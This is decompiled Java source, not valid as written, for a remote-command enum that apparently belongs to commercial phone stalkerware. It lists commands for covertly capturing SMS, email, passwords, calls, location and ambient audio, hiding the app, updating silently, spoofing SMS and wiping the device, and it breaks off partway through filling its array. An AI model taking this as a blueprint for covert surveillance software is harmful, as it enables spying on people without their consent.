package com.vvt.remotecontrol;

public enum RemoteFunction
{
  static
  {
    int i = 4;
    int j = 3;
    int k = 2;
    int m = 1;
    Object localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ACTIVATE_PRODUCT", 0);
    ACTIVATE_PRODUCT = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEACTIVATE_PRODUCT", m);
    DEACTIVATE_PRODUCT = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("IS_PRODUCT_ACTIVATED", k);
    IS_PRODUCT_ACTIVATED = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("UNINSTALL_PRODUCT", j);
    UNINSTALL_PRODUCT = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("GET_LICENSE_STATUS", i);
    GET_LICENSE_STATUS = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("GET_ACTIVATION_CODE", 5);
    GET_ACTIVATION_CODE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("AUTO_ACTIVATE_PRODUCT", 6);
    AUTO_ACTIVATE_PRODUCT = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("MANAGE_COMMON_DATA", 7);
    MANAGE_COMMON_DATA = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_EVENT_DELIVERY", 8);
    ENABLE_EVENT_DELIVERY = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_EVENT_MAX_NUMBER", 9);
    SET_EVENT_MAX_NUMBER = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_EVENT_TIMER", 10);
    SET_EVENT_TIMER = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_DELIVERY_METHOD", 11);
    SET_DELIVERY_METHOD = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ADD_URL", 12);
    ADD_URL = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("RESET_URL", 13);
    RESET_URL = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("CLEAR_URL", 14);
    CLEAR_URL = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("QUERY_URL", 15);
    QUERY_URL = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_EVENT_CAPTURE", 16);
    ENABLE_EVENT_CAPTURE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_CALL", 17);
    ENABLE_CAPTURE_CALL = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_SMS", 18);
    ENABLE_CAPTURE_SMS = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_EMAIL", 19);
    ENABLE_CAPTURE_EMAIL = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_MMS", 20);
    ENABLE_CAPTURE_MMS = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_IM", 21);
    ENABLE_CAPTURE_IM = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_IMAGE", 22);
    ENABLE_CAPTURE_IMAGE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_AUDIO", 23);
    ENABLE_CAPTURE_AUDIO = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_VIDEO", 24);
    ENABLE_CAPTURE_VIDEO = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_WALLPAPER", 25);
    ENABLE_CAPTURE_WALLPAPER = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_APP", 26);
    ENABLE_CAPTURE_APP = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_URL", 27);
    ENABLE_CAPTURE_URL = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_CALL_RECORD", 28);
    ENABLE_CAPTURE_CALL_RECORD = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_CALENDAR", 29);
    ENABLE_CAPTURE_CALENDAR = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_PASSWORD", 30);
    ENABLE_CAPTURE_PASSWORD = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_TEMPORAL_CONTROL_RECORD_AMBIENT", 31);
    ENABLE_TEMPORAL_CONTROL_RECORD_AMBIENT = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_VOIP", 32);
    ENABLE_CAPTURE_VOIP = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_VOIP_CALL_RECORDING", 33);
    ENABLE_VOIP_CALL_RECORDING = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_CONTACT", 34);
    ENABLE_CAPTURE_CONTACT = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_IM_ATTACHMENT_LIMIT_SIZE", 35);
    SET_IM_ATTACHMENT_LIMIT_SIZE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CAPTURE_GPS", 36);
    ENABLE_CAPTURE_GPS = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_GPS_TIME_INTERVAL", 37);
    SET_GPS_TIME_INTERVAL = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("GET_GPS_ON_DEMAND", 38);
    GET_GPS_ON_DEMAND = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_SPY_CALL", 39);
    ENABLE_SPY_CALL = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_WATCH_NOTIFICATION", 40);
    ENABLE_WATCH_NOTIFICATION = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_WATCH_FLAG", 41);
    SET_WATCH_FLAG = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("GET_CONNECTION_HISTORY", 42);
    GET_CONNECTION_HISTORY = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("GET_CONFIGURATION", 43);
    GET_CONFIGURATION = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("GET_SETTINGS", 44);
    GET_SETTINGS = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("GET_DIAGNOSTICS", 45);
    GET_DIAGNOSTICS = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("GET_EVENT_COUNT", 46);
    GET_EVENT_COUNT = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SEND_INSTALLED_APPLICATIONS", 47);
    SEND_INSTALLED_APPLICATIONS = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("REQUEST_CALENDER", 48);
    REQUEST_CALENDER = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_SUPERUSER_VISIBILITY", 49);
    SET_SUPERUSER_VISIBILITY = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_LOCK_PHONE_SCREEN", 50);
    SET_LOCK_PHONE_SCREEN = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("REQUEST_DEVICE_SETTINGS", 51);
    REQUEST_DEVICE_SETTINGS = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_UPDATE_AVAILABLE_SILENT_MODE", 52);
    SET_UPDATE_AVAILABLE_SILENT_MODE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DELETE_DATABASE", 53);
    DELETE_DATABASE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("RESTART_DEVICE", 54);
    RESTART_DEVICE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("REQUEST_HISTORICAL_EVENTS", 55);
    REQUEST_HISTORICAL_EVENTS = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("REQUEST_TEMPORAL_APPLICATION_CONTROL", 56);
    REQUEST_TEMPORAL_APPLICATION_CONTROL = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_DOWNLOAD_BINARY_AND_UPDATE_SILENT_MODE", 57);
    SET_DOWNLOAD_BINARY_AND_UPDATE_SILENT_MODE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SEND_HEARTBEAT", 58);
    SEND_HEARTBEAT = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SEND_MOBILE_NUMBER", 59);
    SEND_MOBILE_NUMBER = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SEND_SETTINGS_EVENT", 60);
    SEND_SETTINGS_EVENT = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SEND_EVENTS", 61);
    SEND_EVENTS = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("REQUEST_CONFIGURATION", 62);
    REQUEST_CONFIGURATION = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SEND_CURRENT_URL", 63);
    SEND_CURRENT_URL = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SEND_BOOKMARKS", 64);
    SEND_BOOKMARKS = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_SWITCH_CONTAINER", 65);
    DEBUG_SWITCH_CONTAINER = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_HIDE_APP", 66);
    DEBUG_HIDE_APP = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_UNHIDE_APP", 67);
    DEBUG_UNHIDE_APP = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_IS_DAEMON", 68);
    DEBUG_IS_DAEMON = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_IS_FULL_MODE", 69);
    DEBUG_IS_FULL_MODE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_GET_CONFIG_ID", 70);
    DEBUG_GET_CONFIG_ID = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_GET_ACTUAL_CONFIG_ID", 71);
    DEBUG_GET_ACTUAL_CONFIG_ID = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_GET_VERSION_CODE", 72);
    DEBUG_GET_VERSION_CODE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_SEND_TEST_SMS", 73);
    DEBUG_SEND_TEST_SMS = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_CLOSE_APP", 74);
    DEBUG_CLOSE_APP = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_BRING_UI_TO_HOME_SCREEN", 75);
    DEBUG_BRING_UI_TO_HOME_SCREEN = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_SET_APPLICATION_MODE", 76);
    DEBUG_SET_APPLICATION_MODE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_GET_APPLICATION_MODE", 77);
    DEBUG_GET_APPLICATION_MODE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_RESTART_DEVICE", 78);
    DEBUG_RESTART_DEVICE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_IS_APPENGIN_INIT_COMPLETE", 79);
    DEBUG_IS_APPENGIN_INIT_COMPLETE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_PRODUCT_VERSION", 80);
    DEBUG_PRODUCT_VERSION = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_IS_CALLRECORDING_SUPPORTED", 81);
    DEBUG_IS_CALLRECORDING_SUPPORTED = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DEBUG_IS_RESUME_ON_DEMAND_AMBIENT_RECORDING", 82);
    DEBUG_IS_RESUME_ON_DEMAND_AMBIENT_RECORDING = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_MODE_ADDRESS_BOOK", 83);
    SET_MODE_ADDRESS_BOOK = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SEND_ADDRESS_BOOK", 84);
    SEND_ADDRESS_BOOK = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("REQUEST_BATTERY_INFO", 85);
    REQUEST_BATTERY_INFO = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("REQUEST_MEDIA_HISTORICAL", 86);
    REQUEST_MEDIA_HISTORICAL = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("UPLOAD_ACTUAL_MEDIA", 87);
    UPLOAD_ACTUAL_MEDIA = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("DELETE_ACTUAL_MEDIA", 88);
    DELETE_ACTUAL_MEDIA = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ON_DEMAND_AMBIENT_RECORD", 89);
    ON_DEMAND_AMBIENT_RECORD = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ON_DEMAND_IMAGE_CAPTURE", 90);
    ON_DEMAND_IMAGE_CAPTURE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_CALL_RECORDING", 91);
    ENABLE_CALL_RECORDING = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_CALL_RECORDING_WATCH_FLAG", 92);
    SET_CALL_RECORDING_WATCH_FLAG = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_CALL_RECORDING_AUDIO_SOURCE", 93);
    SET_CALL_RECORDING_AUDIO_SOURCE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_COMMUNICATION_RESTRICTION", 94);
    ENABLE_COMMUNICATION_RESTRICTION = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_APP_PROFILE", 95);
    ENABLE_APP_PROFILE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_URL_PROFILE", 96);
    ENABLE_URL_PROFILE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SPOOF_SMS", 97);
    SPOOF_SMS = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_PANIC_MODE", 98);
    SET_PANIC_MODE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("START_PANIC", 99);
    START_PANIC = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("STOP_PANIC", 100);
    STOP_PANIC = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("GET_PANIC_MODE", 101);
    GET_PANIC_MODE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("PANIC_IMAGE_CAPTURE", 102);
    PANIC_IMAGE_CAPTURE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("IS_PANIC_ACTIVE", 103);
    IS_PANIC_ACTIVE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("ENABLE_ALERT", 104);
    ENABLE_ALERT = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_LOCK_DEVICE", 105);
    SET_LOCK_DEVICE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_UNLOCK_DEVICE", 106);
    SET_UNLOCK_DEVICE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SET_WIPE", 107);
    SET_WIPE = (RemoteFunction)localObject;
    localObject = new com/vvt/remotecontrol/RemoteFunction;
    ((RemoteFunction)localObject).<init>("SYNC_TEMPORAL_APPLICATION_CONTROL", 108);
    SYNC_TEMPORAL_APPLICATION_CONTROL = (RemoteFunction)localObject;
    localObject = new RemoteFunction[109];
    RemoteFunction localRemoteFunction1 = ACTIVATE_PRODUCT;
    localObject[0] = localRemoteFunction1;
    localRemoteFunction1 = DEACTIVATE_PRODUCT;
    localObject[m] = localRemoteFunction1;
    localRemoteFunction1 = IS_PRODUCT_ACTIVATED;
    localObject[k] = localRemoteFunction1;
    localRemoteFunction1 = UNINSTALL_PRODUCT;
    localObject[j] = localRemoteFunction1;
    localRemoteFunction1 = GET_LICENSE_STATUS;
    localObject[i] = localRemoteFunction1;
    RemoteFunction localRemoteFunction2 = GET_ACTIVATION_CODE;
    localObject[5] = localRemoteFunction2;
    localRemoteFunction2 = AUTO_ACTIVATE_PRODUCT;
    localObject[6] = localRemoteFunction2;
    localRemoteFunction2 = MANAGE_COMMON_DATA;
    localObject[7] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_EVENT_DELIVERY;
    localObject[8] = localRemoteFunction2;
    localRemoteFunction2 = SET_EVENT_MAX_NUMBER;
    localObject[9] = localRemoteFunction2;
    localRemoteFunction2 = SET_EVENT_TIMER;
    localObject[10] = localRemoteFunction2;
    localRemoteFunction2 = SET_DELIVERY_METHOD;
    localObject[11] = localRemoteFunction2;
    localRemoteFunction2 = ADD_URL;
    localObject[12] = localRemoteFunction2;
    localRemoteFunction2 = RESET_URL;
    localObject[13] = localRemoteFunction2;
    localRemoteFunction2 = CLEAR_URL;
    localObject[14] = localRemoteFunction2;
    localRemoteFunction2 = QUERY_URL;
    localObject[15] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_EVENT_CAPTURE;
    localObject[16] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_CALL;
    localObject[17] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_SMS;
    localObject[18] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_EMAIL;
    localObject[19] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_MMS;
    localObject[20] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_IM;
    localObject[21] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_IMAGE;
    localObject[22] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_AUDIO;
    localObject[23] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_VIDEO;
    localObject[24] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_WALLPAPER;
    localObject[25] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_APP;
    localObject[26] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_URL;
    localObject[27] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_CALL_RECORD;
    localObject[28] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_CALENDAR;
    localObject[29] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_PASSWORD;
    localObject[30] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_TEMPORAL_CONTROL_RECORD_AMBIENT;
    localObject[31] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_VOIP;
    localObject[32] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_VOIP_CALL_RECORDING;
    localObject[33] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_CONTACT;
    localObject[34] = localRemoteFunction2;
    localRemoteFunction2 = SET_IM_ATTACHMENT_LIMIT_SIZE;
    localObject[35] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CAPTURE_GPS;
    localObject[36] = localRemoteFunction2;
    localRemoteFunction2 = SET_GPS_TIME_INTERVAL;
    localObject[37] = localRemoteFunction2;
    localRemoteFunction2 = GET_GPS_ON_DEMAND;
    localObject[38] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_SPY_CALL;
    localObject[39] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_WATCH_NOTIFICATION;
    localObject[40] = localRemoteFunction2;
    localRemoteFunction2 = SET_WATCH_FLAG;
    localObject[41] = localRemoteFunction2;
    localRemoteFunction2 = GET_CONNECTION_HISTORY;
    localObject[42] = localRemoteFunction2;
    localRemoteFunction2 = GET_CONFIGURATION;
    localObject[43] = localRemoteFunction2;
    localRemoteFunction2 = GET_SETTINGS;
    localObject[44] = localRemoteFunction2;
    localRemoteFunction2 = GET_DIAGNOSTICS;
    localObject[45] = localRemoteFunction2;
    localRemoteFunction2 = GET_EVENT_COUNT;
    localObject[46] = localRemoteFunction2;
    localRemoteFunction2 = SEND_INSTALLED_APPLICATIONS;
    localObject[47] = localRemoteFunction2;
    localRemoteFunction2 = REQUEST_CALENDER;
    localObject[48] = localRemoteFunction2;
    localRemoteFunction2 = SET_SUPERUSER_VISIBILITY;
    localObject[49] = localRemoteFunction2;
    localRemoteFunction2 = SET_LOCK_PHONE_SCREEN;
    localObject[50] = localRemoteFunction2;
    localRemoteFunction2 = REQUEST_DEVICE_SETTINGS;
    localObject[51] = localRemoteFunction2;
    localRemoteFunction2 = SET_UPDATE_AVAILABLE_SILENT_MODE;
    localObject[52] = localRemoteFunction2;
    localRemoteFunction2 = DELETE_DATABASE;
    localObject[53] = localRemoteFunction2;
    localRemoteFunction2 = RESTART_DEVICE;
    localObject[54] = localRemoteFunction2;
    localRemoteFunction2 = REQUEST_HISTORICAL_EVENTS;
    localObject[55] = localRemoteFunction2;
    localRemoteFunction2 = REQUEST_TEMPORAL_APPLICATION_CONTROL;
    localObject[56] = localRemoteFunction2;
    localRemoteFunction2 = SET_DOWNLOAD_BINARY_AND_UPDATE_SILENT_MODE;
    localObject[57] = localRemoteFunction2;
    localRemoteFunction2 = SEND_HEARTBEAT;
    localObject[58] = localRemoteFunction2;
    localRemoteFunction2 = SEND_MOBILE_NUMBER;
    localObject[59] = localRemoteFunction2;
    localRemoteFunction2 = SEND_SETTINGS_EVENT;
    localObject[60] = localRemoteFunction2;
    localRemoteFunction2 = SEND_EVENTS;
    localObject[61] = localRemoteFunction2;
    localRemoteFunction2 = REQUEST_CONFIGURATION;
    localObject[62] = localRemoteFunction2;
    localRemoteFunction2 = SEND_CURRENT_URL;
    localObject[63] = localRemoteFunction2;
    localRemoteFunction2 = SEND_BOOKMARKS;
    localObject[64] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_SWITCH_CONTAINER;
    localObject[65] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_HIDE_APP;
    localObject[66] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_UNHIDE_APP;
    localObject[67] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_IS_DAEMON;
    localObject[68] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_IS_FULL_MODE;
    localObject[69] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_GET_CONFIG_ID;
    localObject[70] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_GET_ACTUAL_CONFIG_ID;
    localObject[71] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_GET_VERSION_CODE;
    localObject[72] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_SEND_TEST_SMS;
    localObject[73] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_CLOSE_APP;
    localObject[74] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_BRING_UI_TO_HOME_SCREEN;
    localObject[75] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_SET_APPLICATION_MODE;
    localObject[76] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_GET_APPLICATION_MODE;
    localObject[77] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_RESTART_DEVICE;
    localObject[78] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_IS_APPENGIN_INIT_COMPLETE;
    localObject[79] = localRemoteFunction2;
